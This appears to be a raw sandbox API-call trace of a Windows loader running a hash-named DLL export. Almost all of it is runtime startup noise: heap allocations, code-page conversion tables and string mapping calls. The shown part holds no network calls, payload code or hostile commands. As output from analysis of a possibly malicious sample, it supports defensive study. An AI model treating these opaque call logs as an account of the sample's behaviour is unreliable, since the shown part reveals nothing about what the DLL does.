¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0117.657] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0117.657] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0117.657] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0117.657] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0117.657] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f890, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0117.657] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x100) returned 0x4831e0 [0117.657] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7ff626f72300, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0117.657] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x17a) returned 0x479640 [0117.657] RtlInitializeSListHead (in: ListHead=0x7ff626f72160 | out: ListHead=0x7ff626f72160) [0117.657] GetLastError () returned 0x0 [0117.657] SetLastError (dwErrCode=0x0) [0117.657] GetEnvironmentStringsW () returned 0x4850f0* [0117.657] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x9cc) returned 0x485ad0 [0117.658] FreeEnvironmentStringsW (penv=0x4850f0) returned 1 [0117.658] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x118) returned 0x479ef0 [0117.658] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x3e) returned 0x480f90 [0117.658] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x5c) returned 0x470780 [0117.658] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x62) returned 0x4747a0 [0117.658] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x78) returned 0x4755e0 [0117.658] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x62) returned 0x474510 [0117.658] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x28) returned 0x47aec0 [0117.658] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x48) returned 0x4809f0 [0117.658] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1a) returned 0x47ae30 [0117.658] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x3a) returned 0x481210 [0117.658] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x62) returned 0x474000 [0117.658] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x2a) returned 0x47e5c0 [0117.658] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x2e) returned 0x47e540 [0117.658] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1c) returned 0x47b580 [0117.658] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xd2) returned 0x475870 [0117.658] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x7c) returned 0x473c20 [0117.658] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x3a) returned 0x480a90 [0117.658] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x90) returned 0x4720d0 [0117.658] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x24) returned 0x47aef0 [0117.658] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x30) returned 0x47e780 [0117.658] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x36) returned 0x47e680 [0117.658] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x3c) returned 0x480ae0 [0117.658] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x52) returned 0x478d40 [0117.658] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x3c) returned 0x480d60 [0117.658] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xd6) returned 0x4751b0 [0117.658] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x2e) returned 0x47e700 [0117.658] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1e) returned 0x47afb0 [0117.658] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x2c) returned 0x47e340 [0117.658] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x54) returned 0x478da0 [0117.658] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x52) returned 0x478e00 [0117.658] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x24) returned 0x47b280 [0117.658] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x42) returned 0x480b30 [0117.658] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x2c) returned 0x47e200 [0117.658] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x44) returned 0x480b80 [0117.658] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x24) returned 0x47b490 [0117.658] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x485ad0 | out: hHeap=0x470000) returned 1 [0117.659] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1000) returned 0x4850f0 [0117.659] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff626f52580) returned 0x0 [0117.659] GetStartupInfoW (in: lpStartupInfo=0x14fea0 | out: lpStartupInfo=0x14fea0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0117.659] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_create_compress" [0117.659] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_create_compress", pNumArgs=0x14fe70 | out: pNumArgs=0x14fe70) returned 0x479310*="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" [0117.660] LoadLibraryW (lpLibFileName="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") returned 0x7ffc45e90000 [0117.664] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0117.664] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0117.664] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0117.664] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0117.665] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0117.665] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0117.666] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0117.666] GetProcessHeap () returned 0x470000 [0117.666] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0117.666] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0117.666] GetLastError () returned 0x0 [0117.666] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0117.666] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0117.666] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x3c8) returned 0x486580 [0117.667] SetLastError (dwErrCode=0x0) [0117.667] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1200) returned 0x486950 [0117.668] GetStartupInfoW (in: lpStartupInfo=0x14f6f0 | out: lpStartupInfo=0x14f6f0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0117.668] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0117.668] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0117.668] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0117.669] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_create_compress" [0117.669] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_create_compress" [0117.669] GetACP () returned 0x4e4 [0117.669] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x228) returned 0x474290 [0117.669] IsValidCodePage (CodePage=0x4e4) returned 1 [0117.669] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f6b0 | out: lpCPInfo=0x14f6b0) returned 1 [0117.669] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14ef50 | out: lpCPInfo=0x14ef50) returned 1 [0117.669] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0117.669] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14eca0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp") returned 256 [0117.669] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp", cchSrc=256, lpCharType=0x14f270 | out: lpCharType=0x14f270) returned 1 [0117.670] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0117.670] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0117.670] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0117.670] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0117.670] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0117.670] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0117.670] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f070, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ0\x0e\x91_ü\x7f", lpUsedDefaultChar=0x0) returned 256 [0117.670] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0117.670] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0117.670] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0117.670] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 